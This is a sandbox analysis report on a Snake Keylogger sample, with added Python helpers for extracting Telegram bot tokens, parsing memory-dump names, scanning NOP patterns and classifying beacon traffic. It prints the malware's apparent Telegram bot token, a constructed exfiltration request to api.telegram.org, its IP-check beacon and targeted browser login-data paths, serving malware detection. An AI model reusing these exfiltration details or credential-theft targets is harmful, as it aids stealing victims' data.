Windows Analysis Report
RFQ__637456464647.exe

Overview

General Information

Sample Name:RFQ__637456464647.exe
Analysis ID:632544
MD5:b4bc907e8d48e8f09b4d9fdd8d416599
SHA1:592a814a428c8a5de3f06245996fc775e8dc987f
SHA256:7f7804a5460695dae61e378d733f0a613083e84c654ea6264a5276944b33f943
Tags:exe, SnakeKeylogger

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Yara detected Credential Stealer
Uses the system / local time for branch decision (may execute only at specific dates)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Checks if the current process is being debugged
PE file contains more sections than normal
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • RFQ__637456464647.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\RFQ__637456464647.exe" MD5: B4BC907E8D48E8F09B4D9FDD8D416599)
    • RFQ__637456464647.exe (PID: 6400 cmdline: C:\Users\user\Desktop\RFQ__637456464647.exe MD5: B4BC907E8D48E8F09B4D9FDD8D416599)
    • chrome.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\chrome.exe" MD5: 7F916511A313837EFCDE9E4112A64E5B)
    • WerFault.exe (PID: 7124 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 1296 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Exfil Mode": "Telegram", "Telegram Token": "Null!", "Telegram ID": "5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc"}
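Added example (not part of the Joe Sandbox report and not the malware's own code): the extracted configuration above reports "Telegram Token" as the placeholder "Null!" while the value under "Telegram ID" has the documented Telegram bot-token shape, a numeric bot id, a colon and a 35-character secret. The helper below recovers the token regardless of which field the extractor placed it in, derives the Bot API prefix that matches the "https://api.telegram.org/bot" string found in this sample's memory, and scans a memory dump for tokens in both ASCII and UTF-16LE, the encoding .NET strings have in memory (an ASCII-only search misses them). The JSON and the memory blob are constructed test inputs.

```python
import json
import re

# Telegram bot tokens have the documented shape "<numeric bot id>:<35-character secret>".
# The lookarounds stop a match from starting inside a longer number or ending early.
TELEGRAM_BOT_TOKEN_RE = re.compile(rb"(?<!\d)(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")

# Constructed: the configuration exactly as the sandbox's extractor printed it above.
SAMPLE_CONFIG_JSON = (
    '{"Exfil Mode": "Telegram", "Telegram Token": "Null!", '
    '"Telegram ID": "5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc"}'
)

# Constructed memory blob: a UTF-16LE .NET string (API prefix + token) behind an odd
# number of junk bytes, plus a second, made-up token stored as plain ASCII.
SAMPLE_MEMORY = (
    b"junk\x00"
    + "https://api.telegram.org/bot5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc".encode("utf-16-le")
    + b"\x00\x00 ascii:1234567890:abcdefghijabcdefghijabcdefghijabcde tail"
)


def normalize_snake_config(cfg_json: str) -> dict:
    """Recover exfil settings no matter which field the extractor put the token in.
    Here 'Telegram Token' is the placeholder 'Null!' and 'Telegram ID' carries a value
    in bot-token shape, so the key names alone cannot be trusted."""
    cfg = json.loads(cfg_json)
    out = {"exfil_mode": cfg.get("Exfil Mode"), "bot_token": None, "chat_id": None}
    for key in ("Telegram Token", "Telegram ID"):
        val = cfg.get(key)
        if not val or val == "Null!":
            continue
        if TELEGRAM_BOT_TOKEN_RE.fullmatch(val.encode()):
            out["bot_token"] = val
        elif re.fullmatch(r"-?\d+", val):  # chat ids are integers (negative for groups)
            out["chat_id"] = val
    return out


def exfil_url_prefix(bot_token: str) -> str:
    """Bot API prefix every exfil call starts with; useful for proxy-log hunting."""
    return f"https://api.telegram.org/bot{bot_token}/"


def find_telegram_tokens(blob: bytes) -> list:
    """Scan a memory dump for bot tokens in ASCII and in UTF-16LE (both alignments).
    Non-ASCII code units from the UTF-16 decoding are dropped before matching."""
    found = set()
    for m in TELEGRAM_BOT_TOKEN_RE.finditer(blob):
        found.add(m.group(1).decode())
    for off in (0, 1):
        text = blob[off:].decode("utf-16-le", errors="ignore").encode("ascii", errors="ignore")
        for m in TELEGRAM_BOT_TOKEN_RE.finditer(text):
            found.add(m.group(1).decode())
    return sorted(found)
```

Keep this offline: calling the Bot API with a recovered token is legally sensitive and visible to the operator. The numeric bot id is the part to cite in an abuse report, and the URL prefix is what to search for in TLS-inspecting proxy logs.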
Source | Rule | Description | Author | Strings
00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x185d0:$x1: $%SMTPDV$
  • 0x17292:$x2: $#TheHashHere%&
  • 0x18578:$x3: %FTPDV$
  • 0x17274:$x4: $%TelegramDv$
  • 0x14ba3:$x5: KeyLoggerEventArgs
  • 0x14f39:$x5: KeyLoggerEventArgs
  • 0x185fc:$m1: | Snake Keylogger
  • 0x186a2:$m1: | Snake Keylogger
  • 0x187f6:$m1: | Snake Keylogger
  • 0x1891c:$m1: | Snake Keylogger
  • 0x18a76:$m1: | Snake Keylogger
  • 0x1859c:$m2: Clipboard Logs ID
  • 0x187ac:$m2: Screenshot Logs ID
  • 0x188c0:$m2: keystroke Logs ID
  • 0x18aac:$m3: SnakePW
  • 0x18784:$m4: \SnakeKeylogger\
00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
(57 further entries not shown)
Source | Rule | Description | Author | Strings
1.0.RFQ__637456464647.exe.400000.6.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1b0d0:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x1a2b9:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x1a700:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1b881:$a5: \Kometa\User Data\Default\Login Data
1.0.RFQ__637456464647.exe.400000.6.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
1.0.RFQ__637456464647.exe.400000.6.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
1.0.RFQ__637456464647.exe.400000.6.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
1.0.RFQ__637456464647.exe.400000.6.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(109 further entries not shown)
                  No Sigma rule has matched
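Added example (not part of the Joe Sandbox report): the Yara tables above name their sources with two Joe Sandbox conventions, memory dumps such as 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp and unpacked PEs such as 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack. The parser below decodes both. The field layout is inferred from the names in this report and is an assumption, but the hex fields line up with Windows MEMORY_BASIC_INFORMATION values: 0x40 is PAGE_EXECUTE_READWRITE and 0x20000 is MEM_PRIVATE. Decoding the Snake Keylogger hits shows that every dump from process index 1 (the second RFQ__637456464647.exe instance in the process tree, which the tree order suggests is PID 6400) is a writable, executable, non-image region at 0x402000 next to the default .NET image base, while the process 0 hits sit at heap addresses (0x45692e0, 0x42c9510). That matches the "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures: the payload is staged in the parent's heap and runs from the hollowed child.

```python
from dataclasses import dataclass

# Memory protection and region-type constants from winnt.h.
PAGE_FLAGS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
    0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class MemDump:
    process_index: int   # position in the process tree (0 = submitted sample)
    phase: int           # assumption: 0 = dumped while running, 2 = dumped at process end
    base: int            # region base address
    protect: list        # decoded PAGE_* names
    mem_type: str        # MEM_PRIVATE / MEM_MAPPED / MEM_IMAGE

    def is_rwx_private(self) -> bool:
        # Executable, writable, non-image memory: where hollowed or injected PEs live.
        return "PAGE_EXECUTE_READWRITE" in self.protect and self.mem_type == "MEM_PRIVATE"


def parse_sdmp_name(name: str) -> MemDump:
    """Decode a '.sdmp' name. Layout (assumption, inferred from this report):
    proc.phase.seq.base.protect.<unknown>.type.index.sdmp, with base, protect and
    type in hex. The sixth field is sandbox-internal and is not decoded."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    f = stem.split(".")
    if len(f) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    protect_val = int(f[4], 16)
    protect = [n for bit, n in PAGE_FLAGS.items() if protect_val & bit]
    type_val = int(f[6], 16)
    return MemDump(int(f[0]), int(f[1]), int(f[3], 16), protect,
                   MEM_TYPES.get(type_val, f"0x{type_val:x}"))


@dataclass
class UnpackedPE:
    process_index: int
    phase: int
    process_name: str
    base: int
    index: int
    raw: bool            # True for '.raw.unpack' (assumption: dump kept in its raw layout)


def parse_unpack_name(name: str) -> UnpackedPE:
    """Decode '<proc>.<phase>.<process name>.<base>.<n>[.raw].unpack'; the process
    name may itself contain dots, so it is taken from the middle."""
    f = name.split(".")
    if f[-1] != "unpack":
        raise ValueError(f"unexpected unpack name: {name}")
    raw = f[-2] == "raw"
    f = f[:-2] if raw else f[:-1]
    proc, phase, *name_parts, base, idx = f
    return UnpackedPE(int(proc), int(phase), ".".join(name_parts), int(base, 16), int(idx), raw)


def hollowing_candidates(dump_names: list) -> set:
    """(process_index, base) pairs whose Yara-matched dumps are RWX private memory."""
    out = set()
    for n in dump_names:
        if n.endswith(".sdmp"):
            d = parse_sdmp_name(n)
            if d.is_rwx_private():
                out.add((d.process_index, d.base))
    return out
```

Feed hollowing_candidates the source column of a Yara table and it tells you which process to dump and at which base, before you open a single sample.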
                   Timestamp: 05/23/22-19:00:12.710166
                   Source IP: 192.168.2.3
                   Destination IP: 132.226.8.169
                   Source Port: 49740
                   Destination Port: 80
                   Protocol: TCP
                   SID: 2842536
                   Classtype: A Network Trojan was detected

                  AV Detection

                   Source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram Token": "Null!", "Telegram ID": "5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc"}
                   Source: RFQ__637456464647.exe | ReversingLabs: Detection: 46%
                   Source: RFQ__637456464647.exe | Joe Sandbox ML: detected
                   Source: 1.0.RFQ__637456464647.exe.400000.12.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: 1.2.RFQ__637456464647.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: 1.0.RFQ__637456464647.exe.400000.8.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: 1.0.RFQ__637456464647.exe.400000.6.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: 1.0.RFQ__637456464647.exe.400000.4.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: 1.0.RFQ__637456464647.exe.400000.10.unpack | Avira: Label: TR/ATRAPS.Gen
                   Source: RFQ__637456464647.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                   Source: RFQ__637456464647.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: System.Windows.Forms.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: k,C:\Windows\System.pdb source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.Windows.Forms.pdbxT source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: 7.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: .pdb, source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdbP>Q source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: C:\Users\user\Desktop\RFQ__637456464647.PDB6 source: RFQ__637456464647.exe, 00000000.00000000.297785720.0000000001367000.00000004.00000010.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.316242132.0000000001367000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: System.pdb source: WER7284.tmp.dmp.13.dr
                  Source: Binary string: chrome.exe.pdb source: RFQ__637456464647.exe, 00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, RFQ__637456464647.exe, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp, chrome.exe.0.dr
                  Source: Binary string: System.Core.ni.pdb source: WER7284.tmp.dmp.13.dr
                   Source: C:\Users\user\Desktop\RFQ__637456464647.exe | Code function: 4x nop then jmp, one occurrence for each of these targets:
                     054D0741h, 054D02E9h, 054D0B99h, 0648E0A9h, 064848D1h, 06485181h, 0648E981h, 06488149h,
                     064889F9h, 06485A31h, 0648F231h, 06483771h, 06486739h, 06486FE9h, 06484021h, 06487899h,
                     06487CF1h, 064885A1h, 06484D29h, 0648E529h, 064855D9h, 0648EDD9h, 06485E89h, 0648F689h,
                     06483319h, 064862E1h, 0648FAE1h, 06486B91h, 06483BC9h, 06484479h, 06487441h
                   Source: C:\Users\user\Desktop\RFQ__637456464647.exe | Code function: 4x nop then lea esp, dword ptr [ebp-04h] (3 occurrences)
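Added example (not part of the Joe Sandbox report): the "4x nop then jmp" findings above come from a byte-level heuristic, a run of at least four single-byte NOPs (0x90) immediately followed by a branch or a stack adjustment. The scanner below reimplements that heuristic over a code buffer and reports hits with the addresses and branch targets in the form the report uses. The code bytes are constructed; the base address 054D0700h is chosen so that the first hit resolves to 054D0741h, the first target in the list. Compilers and JITs also emit NOP padding for alignment, and the listed targets are all far above the 0x400000 image base, i.e. in dynamically allocated code, which for a .NET sample usually means JIT output; on its own the heuristic is weak and is worth reading together with the injection and Yara results.

```python
import struct

NOP = 0x90
JMP_REL32 = 0xE9
JMP_REL8 = 0xEB
LEA_ESP_EBP_DISP8 = bytes.fromhex("8D65")   # lea esp, dword ptr [ebp+disp8]

# Constructed 32-bit code: two qualifying nop/jmp pairs, one nop/lea pair, one short
# nop run below the threshold, and an ordinary prologue that must not be reported.
SAMPLE_CODE = bytes.fromhex(
    "90909090" "E938000000"      # 4x nop ; jmp +0x38  (-> 054D0741h from base 054D0700h)
    "5589E5"                      # push ebp ; mov ebp, esp
    "9090" "C3"                   # only 2 nops ; ret
    "90909090" "8D65FC"           # 4x nop ; lea esp, dword ptr [ebp-4]
    "909090909090" "EB10"         # 6x nop ; jmp short +0x10
)


def find_nop_then_branch(code: bytes, base: int, min_nops: int = 4) -> list:
    """Report runs of >= min_nops 0x90 bytes followed by jmp rel8/rel32 or
    lea esp,[ebp+disp8]. 'addr' is the address of the first nop; 'target' is the
    resolved jmp destination (None for lea)."""
    hits = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        run = i - start
        if run < min_nops or i >= n:
            continue
        op = code[i]
        if op == JMP_REL32 and i + 5 <= n:
            rel = struct.unpack_from("<i", code, i + 1)[0]
            hits.append({"addr": base + start, "nops": run, "insn": "jmp",
                         "target": (base + i + 5 + rel) & 0xFFFFFFFF})
        elif op == JMP_REL8 and i + 2 <= n:
            rel = struct.unpack_from("<b", code, i + 1)[0]
            hits.append({"addr": base + start, "nops": run, "insn": "jmp",
                         "target": (base + i + 2 + rel) & 0xFFFFFFFF})
        elif code[i:i + 2] == LEA_ESP_EBP_DISP8 and i + 3 <= n:
            disp = struct.unpack_from("<b", code, i + 2)[0]
            hits.append({"addr": base + start, "nops": run,
                         "insn": f"lea esp, dword ptr [ebp{disp:+d}]", "target": None})
    return hits


if __name__ == "__main__":
    for h in find_nop_then_branch(SAMPLE_CODE, 0x054D0700):
        tgt = f"{h['target']:08X}h" if h["target"] is not None else ""
        print(f"{h['addr']:08X}h: {h['nops']}x nop then {h['insn']} {tgt}")
```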

                  Networking

                   Source: Traffic | Snort IDS: 2842536 ETPRO TROJAN 404/Snake/Matiex Keylogger Style External IP Check 192.168.2.3:49740 -> 132.226.8.169:80
                   Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.6.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 1.2.RFQ__637456464647.exe.400000.0.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.10.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.12.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.4.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 1.0.RFQ__637456464647.exe.400000.8.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack, type: UNPACKEDPE
                   Source: Yara match | File source: 0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack, type: UNPACKEDPE
                   Source: Joe Sandbox View | ASN Name: UTMEMUS
                   Source: Joe Sandbox View | IP Address: 132.226.8.169
                   Source: RFQ__637456464647.exe (00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp), chrome.exe.0.dr | String found in binary or memory:
                     http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                     http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                     http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                     http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                     http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                     http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                     http://ocsp.digicert.com0
                     http://ocsp.digicert.com0A
                     http://ocsp.digicert.com0X
                     http://www.digicert.com/CPS0
                   Source: chrome.exe.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                   Source: RFQ__637456464647.exe (00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp) | String found in binary or memory: http://checkip.dyndns.com
                   Source: RFQ__637456464647.exe (00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000002.529500482.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp) | String found in binary or memory: http://checkip.dyndns.org
                   Source: RFQ__637456464647.exe (00000001.00000002.528823599.0000000002F51000.00000004.00000800.00020000.00000000.sdmp) | String found in binary or memory:
                     http://checkip.dyndns.org/
                     http://checkip.dyndns.org4Jk
                     http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                   Source: RFQ__637456464647.exe (00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.317016109.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000000.293530185.0000000004504000.00000004.00000800.00020000.00000000.sdmp, 00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp) | String found in binary or memory:
                     http://checkip.dyndns.org/q
                     https://api.telegram.org/bot
                   Source: RFQ__637456464647.exe | String found in binary or memory:
                     http://sawebservice.red-gate.com/
                     http://www.smartassembly.com/webservices/Reporting/
                     http://www.smartassembly.com/webservices/Reporting/UploadReport2
                     http://www.smartassembly.com/webservices/UploadReportLogin/
                     http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
                     https://dsssdsa.fa
                     https://dsssdsa.fa)Uri
                   Source: RFQ__637456464647.exe (00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp), chrome.exe, chrome.exe (00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp), chrome.exe.0.dr | String found in binary or memory:
                     https://crashpad.chromium.org/
                     https://crashpad.chromium.org/bug/new
                   Source: RFQ__637456464647.exe (00000000.00000002.317423148.00000000044C2000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.318083841.0000000004762000.00000004.00000800.00020000.00000000.sdmp), chrome.exe (00000005.00000000.281746338.00007FF7A8C4A000.00000002.00000001.01000000.00000006.sdmp), chrome.exe.0.dr | String found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
                   Source: unknown | DNS traffic detected: queries for: checkip.dyndns.org
                   Source: global traffic | HTTP traffic detected:
                     GET / HTTP/1.1
                     User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                     Host: checkip.dyndns.org
                     Connection: Keep-Alive
                   Source: RFQ__637456464647.exe (00000000.00000002.316474597.000000000174A000.00000004.00000020.00020000.00000000.sdmp) | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
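Added example (not part of the Joe Sandbox report): the Snort alert above (SID 2842536, "Snake/Matiex Keylogger Style External IP Check") fires on the plaintext request to checkip.dyndns.org, and what makes that request distinctive is not the host, which legitimate tools also query, but the hard-coded User-Agent: an IE6 / .NET 1.0 string from 2003 sent by a process on Windows 10. The detector below parses raw HTTP request heads and classifies them the way that rule does, and additionally recognises a Bot API call to api.telegram.org and pulls the bot token out of its path, since the Telegram channel is this sample's exfil path. All four requests are constructed; the first reproduces the captured one byte for byte, and the Telegram one is hypothetical (the sendDocument method name is an assumption, the token is the one from the extracted configuration). The Telegram check only applies to traffic a TLS-inspecting proxy has decrypted; on the wire you see DNS and SNI for api.telegram.org and nothing else.

```python
import re
from dataclasses import dataclass, field


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.x request-head parser (enough for proxy or sandbox captures).
    Header names are lower-cased so lookups do not depend on the client's casing."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return HttpRequest(method, path, version, headers)


# Hosts this sample resolves and queries to learn the victim's public IP address.
IPCHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
# The exact User-Agent from the captured request. Matched exactly on purpose: a
# looser "MSIE 6.0" match would also catch old scripts and scanners.
SNAKE_STYLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"
# Bot API paths embed the token: /bot<bot id>:<35-char secret>/<method>
TELEGRAM_BOT_PATH_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]{35})/")


def classify_request(req: HttpRequest) -> str:
    host = req.headers.get("host", "").lower().split(":")[0]
    ua = req.headers.get("user-agent", "")
    if host in IPCHECK_HOSTS and ua == SNAKE_STYLE_UA:
        return "snake_ipcheck_beacon"
    if host in IPCHECK_HOSTS:
        return "ipcheck_other_client"
    if host == "api.telegram.org" and TELEGRAM_BOT_PATH_RE.match(req.path):
        return "telegram_bot_api_call"
    return "benign"


def telegram_token_from_path(path: str):
    """Bot token embedded in a Bot API path, or None."""
    m = TELEGRAM_BOT_PATH_RE.match(path)
    return m.group(1) if m else None


# Constructed requests. The first reproduces the captured beacon exactly.
SNAKE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\r\n"
    b"Host: checkip.dyndns.org\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)
CURL_REQUEST = b"GET / HTTP/1.1\r\nHost: checkip.dyndns.org\r\nUser-Agent: curl/7.79.1\r\nAccept: */*\r\n\r\n"
BENIGN_REQUEST = b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
# Hypothetical exfil call (method name assumed); token taken from the extracted config.
TELEGRAM_REQUEST = (
    b"POST /bot5164987354:AAFbwY5baNRyoCilWU25jL6nSQnU8yn8vuc/sendDocument HTTP/1.1\r\n"
    b"Host: api.telegram.org\r\n\r\n"
)
```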

                  System Summary

                   Source: the following unpacked PEs (type: UNPACKEDPE) each matched three rules: "Detects Encrial credential stealer malware" (Author: Florian Roth), "Detects executables with potential process hoocking" (Author: ditekSHen) and "Detects Snake Keylogger" (Author: ditekSHen):
                     1.0.RFQ__637456464647.exe.400000.6.unpack
                     0.0.RFQ__637456464647.exe.45692e0.3.unpack
                     0.0.RFQ__637456464647.exe.42c9510.5.unpack
                     1.2.RFQ__637456464647.exe.400000.0.unpack
                     1.0.RFQ__637456464647.exe.400000.10.unpack
                     0.0.RFQ__637456464647.exe.45692e0.6.unpack
                     0.0.RFQ__637456464647.exe.42c9510.2.unpack
                     1.0.RFQ__637456464647.exe.400000.12.unpack
                     0.2.RFQ__637456464647.exe.45692e0.2.unpack
                     1.0.RFQ__637456464647.exe.400000.4.unpack
                     0.2.RFQ__637456464647.exe.42c9510.1.unpack
                     1.0.RFQ__637456464647.exe.400000.8.unpack
                   Source: the following raw unpacked PEs (type: UNPACKEDPE) each matched "Detects executables with potential process hoocking" and "Detects Snake Keylogger" (both Author: ditekSHen):
                     0.2.RFQ__637456464647.exe.42c9510.1.raw.unpack
                     0.0.RFQ__637456464647.exe.42c9510.2.raw.unpack
                     0.2.RFQ__637456464647.exe.45692e0.2.raw.unpack
                     0.0.RFQ__637456464647.exe.45692e0.6.raw.unpack
                     0.0.RFQ__637456464647.exe.42c9510.5.raw.unpack
                     0.0.RFQ__637456464647.exe.45692e0.3.raw.unpack
                   Source: the following memory dumps (type: MEMORY) each matched "Detects Snake Keylogger" (Author: ditekSHen):
                     00000001.00000000.267692324.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                     00000001.00000000.266228380.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                     00000001.00000002.525677202.0000000000402000.00000040.00000400.00020000.00000000.sdmp
                     00000000.00000000.295208630.00000000047A4000.00000004.00000800.00020000.00000000.sdmp
